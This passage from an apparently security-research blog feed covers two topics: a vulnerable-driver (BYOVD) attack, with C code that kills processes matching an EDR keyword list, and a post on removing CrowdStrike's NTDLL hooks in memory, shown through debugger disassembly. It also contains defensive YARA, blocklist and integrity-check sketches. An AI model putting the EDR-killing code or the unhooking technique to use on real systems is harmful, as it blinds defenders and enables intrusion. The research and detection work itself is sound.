    <span class="hljs-string">"ciscoamp"</span>,      <span class="hljs-string">"cisco amp"</span>,       <span class="hljs-string">"countercept"</span>,
    <span class="hljs-string">"countertack"</span>,   <span class="hljs-string">"cramtray"</span>,        <span class="hljs-string">"crssvc"</span>,
    <span class="hljs-string">"crowdstrike"</span>,   <span class="hljs-string">"csagent"</span>,         <span class="hljs-string">"csfalcon"</span>,
    <span class="hljs-string">"csshell"</span>,       <span class="hljs-string">"cybereason"</span>,      <span class="hljs-string">"cyclorama"</span>,
    <span class="hljs-string">"cylance"</span>,       <span class="hljs-string">"cyoptics"</span>,        <span class="hljs-string">"cyupdate"</span>,
    <span class="hljs-string">"cyvera"</span>,        <span class="hljs-string">"cyserver"</span>,        <span class="hljs-string">"cytray"</span>,
    <span class="hljs-string">"darktrace"</span>,     <span class="hljs-string">"defendpoint"</span>,     <span class="hljs-string">"defender"</span>,
    <span class="hljs-string">"eectrl"</span>,        <span class="hljs-string">"elastic"</span>,         <span class="hljs-string">"endgame"</span>,
    <span class="hljs-string">"f-secure"</span>,      <span class="hljs-string">"forcepoint"</span>,      <span class="hljs-string">"fireeye"</span>,
    <span class="hljs-string">"groundling"</span>,    <span class="hljs-string">"GRRservic"</span>,       <span class="hljs-string">"inspector"</span>,
    <span class="hljs-string">"ivanti"</span>,        <span class="hljs-string">"kaspersky"</span>,       <span class="hljs-string">"lacuna"</span>,
    <span class="hljs-string">"logrhythm"</span>,     <span class="hljs-string">"malware"</span>,         <span class="hljs-string">"mandiant"</span>,
    <span class="hljs-string">"mcafee"</span>,        <span class="hljs-string">"morphisec"</span>,       <span class="hljs-string">"msascuil"</span>,
    <span class="hljs-string">"msmpeng"</span>,       <span class="hljs-string">"nissrv"</span>,          <span class="hljs-string">"omni"</span>,
    <span class="hljs-string">"omniagent"</span>,     <span class="hljs-string">"osquery"</span>,         <span class="hljs-string">"palo alto networks"</span>,
    <span class="hljs-string">"pgeposervice"</span>,  <span class="hljs-string">"pgsystemtray"</span>,    <span class="hljs-string">"privilegeguard"</span>,
    <span class="hljs-string">"procwall"</span>,      <span class="hljs-string">"protectorservic"</span>, <span class="hljs-string">"qradar"</span>,
    <span class="hljs-string">"redcloak"</span>,      <span class="hljs-string">"secureworks"</span>,     <span class="hljs-string">"securityhealthservice"</span>,
    <span class="hljs-string">"semlaunchsv"</span>,   <span class="hljs-string">"sentinel"</span>,        <span class="hljs-string">"sepliveupdat"</span>,
    <span class="hljs-string">"sisidsservice"</span>, <span class="hljs-string">"sisipsservice"</span>,   <span class="hljs-string">"sisipsutil"</span>,
    <span class="hljs-string">"smc.exe"</span>,       <span class="hljs-string">"smcgui"</span>,          <span class="hljs-string">"snac64"</span>,
    <span class="hljs-string">"sophos"</span>,        <span class="hljs-string">"splunk"</span>,          <span class="hljs-string">"srtsp"</span>,
    <span class="hljs-string">"symantec"</span>,      <span class="hljs-string">"symcorpu"</span>,        <span class="hljs-string">"symefasi"</span>,
    <span class="hljs-string">"sysinternal"</span>,   <span class="hljs-string">"sysmon"</span>,          <span class="hljs-string">"tanium"</span>,
    <span class="hljs-string">"tda.exe"</span>,       <span class="hljs-string">"tdawork"</span>,         <span class="hljs-string">"tpython"</span>,
    <span class="hljs-string">"vectra"</span>,        <span class="hljs-string">"wincollect"</span>,      <span class="hljs-string">"windowssensor"</span>,
    <span class="hljs-string">"wireshark"</span>,     <span class="hljs-string">"threat"</span>,          <span class="hljs-string">"xagt.exe"</span>,
    <span class="hljs-string">"xagtnotif.exe"</span> ,<span class="hljs-string">"mssense"</span> };

<span class="hljs-keyword">int</span> g_edrlistSize = <span class="hljs-keyword">sizeof</span>(g_edrlist) / <span class="hljs-keyword">sizeof</span>(g_edrlist[<span class="hljs-number">0</span>]);

<span class="hljs-function"><span class="hljs-keyword">int</span> <span class="hljs-title">isInEdrlist</span><span class="hljs-params">(<span class="hljs-keyword">const</span> <span class="hljs-keyword">char</span>* pn)</span> </span>{
    <span class="hljs-keyword">char</span>* tempv = toLowercase(pn);
    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> i = <span class="hljs-number">0</span>; i &lt; g_edrlistSize; i++) {
        <span class="hljs-keyword">if</span> (<span class="hljs-built_in">strstr</span>(tempv, g_edrlist[i]) != <span class="hljs-literal">NULL</span>) {
            <span class="hljs-built_in">free</span>(tempv);
            <span class="hljs-keyword">return</span> <span class="hljs-number">1</span>;
        }
    }
    <span class="hljs-built_in">free</span>(tempv);
    <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;
}
</code></pre>
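<p>The matching logic is plain case-insensitive substring search, which is worth seeing in isolation because of how broad it is. The sketch below re-implements it over a small subset of the keyword list above. The function name <code>matched_keyword</code> and the sample process names are assumptions for illustration, not a claim about any specific product.</p>

```python
# A small subset of the keyword list above, for illustration only.
KEYWORDS = ("crowdstrike", "csagent", "defender", "msmpeng",
            "omni", "sysmon", "threat", "wireshark")


def matched_keyword(process_name: str):
    """Return the first keyword contained in the lowercased name, or None."""
    lowered = process_name.lower()
    for keyword in KEYWORDS:
        if keyword in lowered:
            return keyword
    return None


# Example process names; any name containing a keyword is a hit.
for name in ("MsMpEng.exe", "Sysmon64.exe", "Wireshark.exe",
             "OmniSharp.exe", "notepad.exe"):
    print(name, matched_keyword(name))
```

<p>Short keywords such as <code>omni</code> or <code>threat</code> will also hit processes that have nothing to do with security tooling, so a list like this trades precision for coverage.</p>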
<p>Once we have the handle to the device, we send an IOCTL request with the code <code>0x80002010</code> to register ourselves with the driver. This IOCTL call adds the requesting process ID to the driver's list of trusted processes and must be called before any other IOCTL.</p>
<p>Next we can capture a snapshot of all the processes currently active on the system using the <code>CreateToolhelp32Snapshot</code> function. This snapshot serves as a holistic view of the system's running processes, allowing for a systematic evaluation of each one. Subsequently, the function iterates over each process in this snapshot using a combination of <code>Process32First</code> and <code>Process32Next</code>.</p>
<p>As each process is accessed, its name is compared against the predefined list of known EDR processes using the <code>isInEdrlist</code> function. If a match is identified, indicating that the process could be an active EDR solution, it will be terminated using the <code>DeviceIoControl</code> function.</p>
<pre><code class="lang-cpp"><span class="hljs-function">DWORD <span class="hljs-title">checkEDRProcesses</span><span class="hljs-params">(HANDLE hDevice)</span> </span>{
    <span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span> procId, ecount = <span class="hljs-number">0</span>;
    HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, <span class="hljs-number">0</span>);
    <span class="hljs-keyword">if</span> (hSnap == INVALID_HANDLE_VALUE) <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;

    PROCESSENTRY32 pE = { <span class="hljs-keyword">sizeof</span>(pE) };
    <span class="hljs-keyword">if</span> (Process32First(hSnap, &amp;pE)) {
        <span class="hljs-keyword">do</span> {
            <span class="hljs-keyword">char</span> exeName[MAX_PATH];
            wcstombs(exeName, pE.szExeFile, MAX_PATH);
            <span class="hljs-keyword">if</span> (isInEdrlist(exeName) &amp;&amp; 
                !DeviceIoControl(hDevice, IOCTL_TERMINATE_PROCESS, &amp;(procId = pE.th32ProcessID),
                                 <span class="hljs-keyword">sizeof</span>(procId), <span class="hljs-literal">NULL</span>, <span class="hljs-number">0</span>, <span class="hljs-literal">NULL</span>, <span class="hljs-literal">NULL</span>)) ecount++;
        } <span class="hljs-keyword">while</span> (Process32Next(hSnap, &amp;pE));
    }
    CloseHandle(hSnap);
    <span class="hljs-keyword">return</span> ecount;
}
</code></pre>
<p>Bring Your Own Vulnerable Driver (BYOVD) attacks are becoming a more common entry point for malware builders to exploit, and the way to do it isn’t even really that complicated since making IOCTL calls isn’t rocket science.</p>
<p>While there are solutions such as the <a target="_blank" href="https://github.com/MicrosoftDocs/windows-itpro-docs/blob/public/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules.md">Microsoft HVCI Driver Blocklist</a>, it’s still updated only <a target="_blank" href="https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules">1-2 times</a> per year. That slow cadence is part of why the driver's certificate hasn’t been revoked in Windows and why major EDR vendors haven't caught up to the issue.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1685810016505/054ab980-2b4b-465a-a736-c4863e84361e.png" alt class="image--center mx-auto" /></p>
<p>Only one security vendor was able to detect the tool: Elastic EDR, which has an <a target="_blank" href="https://github.com/elastic/protections-artifacts">open-source ruleset</a> for the driver (an absolute win for OSS btw). The fact that Elastic EDR wasn't mentioned in the RAMP forum post also says something about the importance of keeping driver blocklists up-to-date.</p>
<pre><code class="lang-python">rule Windows_VulnDriver_Zam_928812a7 {
    meta:
        author = <span class="hljs-string">"Elastic Security"</span>
        id = <span class="hljs-string">"928812a7-ac7c-47cf-9111-11470b661d46"</span>
        fingerprint = <span class="hljs-string">"8e5db0d4fee806538929680e7d3521b111b0e09fcc3eba3c191f6787375999cc"</span>
        creation_date = <span class="hljs-string">"2022-04-04"</span>
        last_modified = <span class="hljs-string">"2022-04-04"</span>
        threat_name = <span class="hljs-string">"Windows.VulnDriver.Zam"</span>
        reference_sample = <span class="hljs-string">"543991ca8d1c65113dff039b85ae3f9a87f503daec30f46929fd454bc57e5a91"</span>
        severity = <span class="hljs-number">50</span>
        arch_context = <span class="hljs-string">"x86"</span>
        scan_context = <span class="hljs-string">"file"</span>
        license = <span class="hljs-string">"Elastic License v2"</span>
        os = <span class="hljs-string">"windows"</span>
    strings:
        $pdb_64 = <span class="hljs-string">"AntiMalware\\bin\\zam64.pdb"</span>
        $pdb_32 = <span class="hljs-string">"AntiMalware\\bin\\zam32.pdb"</span>
    condition:
        int16(uint32(<span class="hljs-number">0x3C</span>) + <span class="hljs-number">0x5c</span>) == <span class="hljs-number">0x0001</span> <span class="hljs-keyword">and</span> any of ($pdb_*)
}
</code></pre>
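<p>The rule's condition is compact, so here is a rough Python equivalent of what it checks. This is a sketch, not Elastic's implementation: <code>matches_zam_rule</code> and <code>fake_image</code> are made-up names, and the test buffer is synthetic rather than a real PE. The offsets follow the PE layout: <code>0x3C</code> holds the offset of the PE header, and <code>0x5C</code> bytes past that is the optional header's <code>Subsystem</code> field, where a value of 1 means a native (driver) image.</p>

```python
import struct

# PDB path fragments the rule looks for (single backslashes in the actual bytes).
PDB_MARKERS = (rb"AntiMalware\bin\zam64.pdb", rb"AntiMalware\bin\zam32.pdb")
IMAGE_SUBSYSTEM_NATIVE = 1


def matches_zam_rule(data: bytes) -> bool:
    """Mirror the rule's condition: native subsystem plus either PDB string."""
    if len(data) < 0x40:
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)  # offset of the PE header
    if e_lfanew + 0x5E > len(data):
        return False
    # 0x5C past the PE signature is OptionalHeader.Subsystem (PE32 and PE32+).
    (subsystem,) = struct.unpack_from("<h", data, e_lfanew + 0x5C)
    return subsystem == IMAGE_SUBSYSTEM_NATIVE and any(m in data for m in PDB_MARKERS)


def fake_image(subsystem: int, marker: bytes) -> bytes:
    """Build a synthetic buffer with only the fields the check reads (not a real PE)."""
    buf = bytearray(0x200)
    struct.pack_into("<I", buf, 0x3C, 0x80)
    struct.pack_into("<h", buf, 0x80 + 0x5C, subsystem)
    buf[0x100:0x100 + len(marker)] = marker
    return bytes(buf)


print(matches_zam_rule(fake_image(1, PDB_MARKERS[0])))  # True
print(matches_zam_rule(fake_image(2, PDB_MARKERS[0])))  # False
```

<p>Because the check keys on content embedded in the driver rather than on the file name, dropping the driver under a random name doesn't help it slip past.</p>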
<p>As these attacks become more common, the way EDR/AVs detect and block drivers needs to be accelerated. Open-source projects such as LOLDrivers have thousands of vulnerable drivers, with hundreds that aren’t in the HVCI blocklist, and they also offer open-source <a target="_blank" href="https://github.com/magicsword-io/LOLDrivers/blob/main/detections/sigma/driver_load_win_vuln_drivers.yml">Sigma rules</a> for detection.</p>
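<p>The simplest form of such a blocklist is a hash lookup. The sketch below is a minimal illustration, assuming the list is a set of SHA-256 strings. The only entry is the <code>reference_sample</code> value from the Elastic rule above, and <code>is_blocked</code> is a hypothetical helper, not part of any of the projects mentioned.</p>

```python
import hashlib

# SHA-256 values of known-vulnerable drivers. The single entry is the
# reference_sample from the Elastic rule above; a real list would be loaded
# from a maintained feed and refreshed regularly.
BLOCKED_SHA256 = {
    "543991ca8d1c65113dff039b85ae3f9a87f503daec30f46929fd454bc57e5a91",
}


def is_blocked(driver_bytes: bytes, blocklist=BLOCKED_SHA256) -> bool:
    """Return True when the SHA-256 of the driver image is on the blocklist."""
    return hashlib.sha256(driver_bytes).hexdigest() in blocklist


# Placeholder bytes, not a real driver: unknown content is not blocked.
print(is_blocked(b"not a real driver"))
```

<p>A lookup like this is only as good as the list behind it, which is the whole argument for updating blocklists more often than once or twice a year.</p>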
]]></content:encoded></item><item><title><![CDATA[Evading EDRs by Unhooking NTDLL In-Memory]]></title><description><![CDATA[EDR (Endpoint Detection and Response) hooking is a well-known technique used in cybersecurity, and there are many examples available online of unhooking NTDLL (NT Dynamic Link Library), often using direct syscalls or mapping of NTDLL from disk or kno...]]></description><link>https://research.meekolab.com/evading-edrs-by-unhooking-ntdll-in-memory</link><guid isPermaLink="true">https://research.meekolab.com/evading-edrs-by-unhooking-ntdll-in-memory</guid><dc:creator><![CDATA[meekochii]]></dc:creator><pubDate>Thu, 13 Apr 2023 07:40:15 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1686025454180/15af63b4-2002-4cc7-b280-dba9c932af0b.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>EDR (Endpoint Detection and Response) hooking is a well-known technique used in cybersecurity, and there are many examples available online of unhooking NTDLL (NT Dynamic Link Library), often using direct syscalls or mapping of NTDLL from disk or known dlls.</p>
<p>Many of the common methods for unhooking NTDLL rely on <code>VirtualProtect</code> or <code>NtProtectVirtualMemory</code>, and they can fail when a hook is placed on <code>NtProtectVirtualMemory</code> itself. This creates a chicken-and-egg problem: the unhooking operation has to call a function that is already hooked, so the hook fires during the unhooking process and the EDR/AV can detect and potentially block the operation.</p>
<pre><code class="lang-plaintext">0:000&gt; u ntdll!NtProtectVirtualMemory        L1
ntdll!NtProtectVirtualMemory:
00007ffe`ac9703f0 e9e10b9def        jmp        00007ffe`9c340fd6
0:000&gt; u 00007ffe`9c340fd6    L1
csagent!CVCCP+0xe9f0:
00007ffe`a9a3ad60  4c8bdc           mov   r11,rsp
00007ffe`a9a3ad63  55               push  rbp
00007ffe`a9a3ad64  53               push  rbx
00007ffe`a9a3ad65  4155             push  r13
00007ffe`a9a3ad67  498dab68fdffff   lea   rbp,[r11-298h]
00007ffe`a9a3ad6e  4881ec80030000   sub   rsp,380h   
00007ffe`a9a3ad75  488b05ecd20a00   mov   rax,qword ptr [csagent!A3+0x93818 (00007ffe`a9ae8068)]
00007ffe`a9a3ad7c  4833c4           xor   rax,rsp
</code></pre>
<p>One approach to bypassing NTDLL hooks is to use direct syscalls, where you have your own syscall stubs and issue syscalls directly from your own modules instead of relying on APIs from NTDLL. This can help avoid NTDLL hooks and prevent detection by EDR/AV systems.</p>
<p>However, not all NTDLL functions are syscalls. Some functions, like <code>PssNtCaptureSnapshot</code>, are not exposed as syscalls and cannot be invoked directly using this approach. This limitation poses a challenge when the hooked NTDLL functions you need are not reachable via direct syscalls.</p>
<pre><code class="lang-c">// Decompiler output (truncated): ordinary user-mode code, not a syscall stub
uint64_t PssNtCaptureSnapshot(int64_t* arg1, int64_t arg2, int32_t arg3, int32_t arg4)
        int64_t r13 = arg2
        uint64_t rax_1
        if ((arg3 &amp; 0x3ff8000) != 0)
                rax_1 = 0xc000000d  // STATUS_INVALID_PARAMETER
        else
            int32_t r15_2 = arg3 &amp; 0x1c000000
            if (r15_2 == 0x4000000)
                    rax_1 = 0xc0000030  // STATUS_INVALID_PARAMETER_MIX
            else
                int64_t rbx_1 = 0
                uint64_t var_68 = 0
                uint64_t var_50 = 0
                int64_t var_70 = 0
                int64_t var_58 = 0
                int32_t rsi_2 = arg3 &amp; 0x40000000
                if (rsi_2 != 0)
                        rbx_1 = *0x7ffe0300
                        PsspSampleCounters(&amp;var_50, &amp;var_58)
                double (* rcx_2)[0x4] = *arg1
</code></pre>
<p>Additionally, using direct syscalls may require extensive knowledge of the underlying operating system's internals, including the system call interface, which can be complex and undocumented. This can make the development and maintenance of such syscall stubs more challenging, as it may require constant updates and testing to ensure compatibility with different OS versions and security updates.</p>
<p>EDRs may also flag inline syscalls as suspicious during their monitoring process. This is because inline syscalls can be used both by legitimate software and by malicious software, and EDRs need to analyze their usage in the context of other behaviors and characteristics of the software being monitored to determine if it is indicative of potential malicious activity.</p>
<p>There is another approach, based on the fact that the original code blocks replaced by the hooks must still live somewhere in memory: the AV/EDR has to keep them around so it can let calls through when it deems them legitimate.</p>
<p>So if we utilize in-memory disassembly to identify patterns that lead to the original (unhooked) code blocks and find the unhooked original <code>NtProtectVirtualMemory</code> function, we can use it to apply the rest of our unhooking logic to remove all EDR hooks.</p>
<p>Let's identify the patterns in CrowdStrike Falcon that lead to the original unhooked blocks:</p>
<pre><code class="lang-plaintext">0:000&gt; u ntdll!NtProtectVirtualMemory        L1
ntdll!NtProtectVirtualMemory:
00007ffe`ac9703f0 e9e10b9def        jmp        00007ffe`9c340fd6
0:000&gt; u 00007ffe`9c340fd6    L1
csagent!CVCCP+0xe9f0:
00007ffe`a9a3ad60  4c8bdc           mov   r11,rsp
00007ffe`a9a3ad63  55               push  rbp
00007ffe`a9a3ad64  53               push  rbx
00007ffe`a9a3ad65  4155             push  r13
00007ffe`a9a3ad67  498dab68fdffff   lea   rbp,[r11-298h]
00007ffe`a9a3ad6e  4881ec80030000   sub   rsp,380h   
00007ffe`a9a3ad75  488b05ecd20a00   mov   rax,qword ptr [csagent!A3+0x93818 (00007ffe`a9ae8068)]
00007ffe`a9a3ad7c  4833c4           xor   rax,rsp
</code></pre>
<p>In the disassembled snippet, the <code>NtProtectVirtualMemory</code> function in <code>ntdll.dll</code> is hooked with a direct jump instruction (<code>jmp</code>) to an address outside of <code>ntdll.dll</code>, which ends up at <code>csagent!CVCCP+0xe9f0</code> in the <code>csagent</code> module.</p>
<p>This shows that <code>NtProtectVirtualMemory</code> has been intercepted and its execution redirected to a different code path inside the <code>csagent</code> module: a hook (detour) used to monitor or modify the behavior of the function.</p>
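<p>To make the redirect concrete, here is a minimal Python sketch (my own illustration, not part of any tooling from this post) that decodes the <code>e9</code> near jump from the listing above. The helper name <code>decode_rel32_jmp</code> is hypothetical; the address and bytes are copied from the WinDbg output.</p>
<pre><code class="lang-python">def decode_rel32_jmp(address, raw):
    """Return the destination of an E9 rel32 near jump located at `address`."""
    if len(raw) != 5 or raw[0] != 0xE9:
        raise ValueError("not a 5-byte E9 rel32 jump")
    # rel32 is a signed little-endian displacement measured from the next instruction.
    rel32 = int.from_bytes(raw[1:5], "little", signed=True)
    return (address + 5 + rel32) % 2**64


# ntdll!NtProtectVirtualMemory as shown in the hooked listing
target = decode_rel32_jmp(0x00007FFEAC9703F0, bytes.fromhex("e9e10b9def"))
print(hex(target))  # 0x7ffe9c340fd6
</code></pre>
<p>The decoded destination matches the <code>jmp</code> operand in the debugger output, which confirms that the first instruction of the function no longer belongs to the original stub.</p>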
<p>But how do we identify the original unhooked code blocks for a particular function? Let's look at further disassembly in csagent’s hook:</p>
<pre><code class="lang-plaintext">csagent!CVCCP+0xef02:
00007ffe`a9a3b272  488b059f600b00   mov   rax,qword ptr [csagent!A3+0x9cac8 (00007ffe`a9af1318)]
00007ffe`a9a3b279  48895c2420       mov   qword ptr [rsp+20h],rbx
00007ffe`a9a3b27e  ff1564c20700     call  qword ptr [csagent!A3+0x62c98 (00007ffe`a9ab74e8)]
0:000&gt; u poi(00007ffe`a9af1318) L3
00007ffe`9c340fc0  4c8bd1           mov   r10,rcx
00007ffe`9c340fc3  b850000000       mov   eax,50h
00007ffe`9c340fc8  ff2500000000     jmp   qword ptr [00007ffe`9c340fce]
0:000&gt; u poi(00007ffe`9c340fce)
ntdll!NtProtectVirtualMemory+0x8:
00007ffe`ac9703f8  f604250803fe7f01 test  byte ptr [SharedUserData+0x308 (00000000`7ffe0308)],1
00007ffe`ac970400  7503             jne   ntdll!NtProtectVirtualMemory+0x15 (00007ffe`ac970405)
00007ffe`ac970402  0f05             syscall
00007ffe`ac970404  c3               ret
</code></pre>
<p>Further disassembly of <code>NtProtectVirtualMemory</code>, identifying the original syscall stub</p>
<p>The disassembly shows a pointer being loaded into RAX from <code>csagent!A3+0x9cac8</code> (the value stored at <code>00007ffea9af1318</code>), followed by an indirect call that transfers control to the pointer held in RAX. That pointer leads to a small trampoline that replays the overwritten instructions (<code>mov r10,rcx</code> and <code>mov eax,50h</code>) and then jumps to <code>ntdll!NtProtectVirtualMemory+0x8</code> (at <code>00007ffeac9703f8</code>), the rest of the original, unhooked syscall stub that the hook replaced.</p>
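<p>One way to tell a relocated syscall prologue from a hooked entry point is to look at the leading bytes. The sketch below is a rough illustration that assumes the usual x64 stub layout of <code>mov r10,rcx</code> followed by <code>mov eax,imm32</code>; the function name <code>parse_syscall_number</code> is hypothetical, and the byte strings are taken from the listings in this post.</p>
<pre><code class="lang-python">SYSCALL_PROLOGUE = bytes.fromhex("4c8bd1b8")  # mov r10,rcx plus the opcode byte of mov eax,imm32


def parse_syscall_number(raw):
    """Return the syscall number if `raw` starts like an x64 syscall stub, else None."""
    immediate = raw[4:8]
    if raw[:4] != SYSCALL_PROLOGUE or len(immediate) != 4:
        return None
    return int.from_bytes(immediate, "little")


trampoline = bytes.fromhex("4c8bd1b850000000ff2500000000")  # bytes at 00007ffe`9c340fc0
hooked_entry = bytes.fromhex("e9e10b9def")                  # bytes at ntdll!NtProtectVirtualMemory
print(parse_syscall_number(trampoline))    # 80 (0x50)
print(parse_syscall_number(hooked_entry))  # None
</code></pre>
<p>The hooked entry point fails the check because it starts with a <code>jmp</code>, while the relocated prologue still carries the syscall number <code>50h</code>.</p>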
<p>The pattern is similar for hooked functions that are not syscalls. Let's look at <code>PssNtCaptureSnapshot</code>:</p>
<pre><code class="lang-plaintext">0:000&gt; u ntdll!PssNtCaptureSnapshot L1
ntdll!PssNtCaptureSnapshot:
00007ffe`ac9f8e10 e9807d94ef       jmp      00007ffe`9c340b95
0:000&gt; u 00007ffe`9c340b95 L1
00007ffe`9c340b95 ff2500000000     jmp      qword ptr [00007ffe`9c340b9b]
0:000&gt; u poi(00007ffe`9c340b9b)
csagent!CVCCP+0xb410:
00007ffe`a9a37780  488bc4          mov      rax,rsp
00007ffe`a9a37783  55              push     rbp
00007ffe`a9a37784  53              push     rbx
00007ffe`a9a37785  56              push     rsi
00007ffe`a9a37786  57              push     rdi
00007ffe`a9a37787  4154            push     r12
00007ffe`a9a37789  4155            push     r13
00007ffe`a9a3778b  4156            push     r14
</code></pre>
<p>The disassembly of <code>ntdll!PssNtCaptureSnapshot</code> shows a similar pattern: a jump followed by an indirect jump to an address outside of <code>ntdll.dll</code>, specifically <code>csagent!CVCCP+0xb410</code> (at <code>00007ffea9a37780</code>). This is consistent with the other hooked functions in <code>ntdll.dll</code>, where the hook performs a jump followed by an indirect jump into the <code>csagent</code> module. Redirecting a function's execution flow to a custom implementation in an external module this way is a common hooking technique.</p>
<pre><code class="lang-plaintext">csagent!CVCCP+0xba33:
00007ffe`a9a37da3 488b05be940b00    mov      rax,qword ptr [csagent!A3+0x9ca18 (00007ffe`a9af1268)]
00007ffe`a9a37daa ff1538f70700      call     qword ptr [csagent!A3+0x62c98 (00007ffe`a9ab74e8)]
0:000&gt; u poi(00007ffe`a9af1268) L3
00007ffe`9c340b80 488bc4            mov      rax,rsp
00007ffe`9c340b83 48895808          mov      qword ptr [rax+8],rbx
00007ffe`9c340b87 ff2500000000      jmp      qword ptr [00007ffe`9c340b8d]
0:000&gt; u poi(00007ffe`9c340b8d)
ntdll!PssNtCaptureSnapshot+0x7:
00007ffe`ac9f8e17  44894820        mov      dword ptr [rax+20h],r9d
00007ffe`ac9f8e1b  48895010        mov      qword ptr [rax+10h],rdx
00007ffe`ac9f8e1f  55              push     rbp
00007ffe`ac9f8e20  56              push     rsi
00007ffe`ac9f8e21  57              push     rdi
00007ffe`ac9f8e22  4154            push     r12
00007ffe`ac9f8e24  4155            push     r13
00007ffe`ac9f8e26  4156            push     r14
</code></pre>
<p>We can observe the same pattern here where RAX is loaded with a pointer followed by an indirect call that jumps to the address stored in RAX, which is the original code block of <code>PssNtCaptureSnapshot</code> without hooks. So we can now simply identify these patterns to locate the unhooked original functions using a disassembler and translate that logic into code that uses in-memory disassembly to identify the original code blocks at runtime.</p>
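<p>The pointer slots in these listings are addressed relative to RIP, so resolving them is plain arithmetic on the instruction bytes. Here is a small sketch of that calculation, assuming only the two encodings that appear above (<code>48 8B 05</code> for <code>mov rax,[rip+disp32]</code> and <code>FF 15</code> for <code>call [rip+disp32]</code>); the function name <code>rip_relative_target</code> is hypothetical and a real disassembler handles far more cases.</p>
<pre><code class="lang-python">OPCODES = (bytes.fromhex("488b05"), bytes.fromhex("ff15"))


def rip_relative_target(address, raw):
    """Resolve the memory operand of a RIP-relative mov rax / call instruction."""
    for opcode in OPCODES:
        if raw.startswith(opcode) and len(raw) == len(opcode) + 4:
            disp32 = int.from_bytes(raw[len(opcode):], "little", signed=True)
            # RIP already points at the next instruction when the operand is evaluated.
            return (address + len(raw) + disp32) % 2**64
    return None


# Instructions taken from the csagent!CVCCP+0xef02 listing
print(hex(rip_relative_target(0x00007FFEA9A3B272, bytes.fromhex("488b059f600b00"))))  # 0x7ffea9af1318
print(hex(rip_relative_target(0x00007FFEA9A3B27E, bytes.fromhex("ff1564c20700"))))    # 0x7ffea9ab74e8
</code></pre>
<p>Both results agree with the addresses WinDbg prints in parentheses, which is a useful sanity check when reading hook code by hand.</p>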
<p>Once we locate the unhooked/original functions at runtime, we replace the hooks from the EDR/AV with our hook that JMPs into the unpatched originals.</p>
<pre><code class="lang-plaintext">0:001&gt; u ntdll!PssNtCaptureSnapshot L1
ntdll!PssNtCaptureSnapshot:
00007ffe`ac9f8e10 e96b7d94ef       jmp      00007ffe`9c340b80
0:001&gt; u 00007ffe`9c340b80 L3
00007ffe`9c340b80 488bc4           mov      rax,rsp
00007ffe`9c340b83 48895808         mov      qword ptr [rax+8],rbx
00007ffe`9c340b87 ff2500000000     jmp      qword ptr [00007ffe`9c340b8d]
0:001&gt; u poi(00007ffe`9c340b8d)
ntdll!PssNtCaptureSnapshot+0x7:
00007ffe`ac9f8e17  44894820        mov      dword ptr [rax+20h],r9d
00007ffe`ac9f8e1b  48895010        mov      qword ptr [rax+10h],rdx
00007ffe`ac9f8e1f  55              push     rbp
00007ffe`ac9f8e20  56              push     rsi
00007ffe`ac9f8e21  57              push     rdi
00007ffe`ac9f8e22  4154            push     r12
00007ffe`ac9f8e24  4155            push     r13
00007ffe`ac9f8e26  4156            push     r14
0:001&gt; u ntdll!NtProtectVirtualMemory L1
ntdll!NtProtectVirtualMemory:
00007ffe`ac9703f0 e9cb0b9def       jmp      00007ffe`9c340fc0
0:001&gt; u 00007ffe`9c340fc0 L3
00007ffe`9c340fc0 4c8bd1           mov      r10,rcx
00007ffe`9c340fc3 b850000000       mov      eax,50h
00007ffe`9c340fc8 ff2500000000     jmp      qword ptr [00007ffe`9c340fce]
0:001&gt; u poi(00007ffe`9c340fce) L3
ntdll!NtProtectVirtualMemory+0x8:
00007ffe`ac9703f8 f604250803fe7f01 test     byte ptr [SharedUserData+0x308 (00000000`7ffe0308)],1
00007ffe`ac970400 7503             jne      ntdll!NtProtectVirtualMemory+0x15 (00007ffe`ac970405)
00007ffe`ac970402 0f05             syscall
</code></pre>
<p>After the unhooking attempt, the jump instructions at the beginning of the functions now redirect to the original code blocks found in memory. By avoiding direct syscalls and not relying on any hooked APIs before unhooking, we have likely avoided the detection opportunities the hooks create and restored the original behavior of the ntdll.dll module.</p>
<p>One countermeasure for EDR providers is to add memory inspection capabilities to their products, to mitigate threat actors that use in-memory disassembly to remove hooks from NTDLL, a critical component of the Windows operating system. Memory inspection provides deeper visibility into the runtime state of processes and can help detect malicious activity hidden in memory.</p>
<p>By inspecting the memory of processes, EDR solutions can identify suspicious or malicious code injections, hooking, and other tampering techniques that may be used by threat actors to bypass security controls and gain unauthorized access to a system. Memory inspection can also help detect advanced techniques such as reflective DLL loading, in which malicious code is loaded into a process's memory without touching the disk, making it harder to detect using traditional file-based detection methods.</p>
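<p>As a rough illustration of what such a check could look like for the hooks in this post, the sketch below verifies that a hooked entry point still jumps to the address the EDR originally installed. Everything here is an assumption for illustration: the helper name <code>hook_still_points_at</code> is hypothetical, the bytes are copied from the before and after listings, and a real product would read them from the monitored process rather than from constants.</p>
<pre><code class="lang-python">def hook_still_points_at(address, raw, expected_target):
    """True if the 5 bytes at `address` are still a jmp rel32 into `expected_target`."""
    if len(raw) != 5 or raw[0] != 0xE9:
        return False
    rel32 = int.from_bytes(raw[1:5], "little", signed=True)
    return (address + 5 + rel32) % 2**64 == expected_target


NT_PROTECT = 0x00007FFEAC9703F0   # ntdll!NtProtectVirtualMemory in the listings
EDR_TARGET = 0x00007FFE9C340FD6   # where the hook pointed before unhooking

print(hook_still_points_at(NT_PROTECT, bytes.fromhex("e9e10b9def"), EDR_TARGET))  # True
print(hook_still_points_at(NT_PROTECT, bytes.fromhex("e9cb0b9def"), EDR_TARGET))  # False
</code></pre>
<p>The second call uses the bytes seen after unhooking: the entry point is still a <code>jmp</code>, but it no longer lands on the EDR's code, which is exactly the kind of tampering a periodic integrity check could surface.</p>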
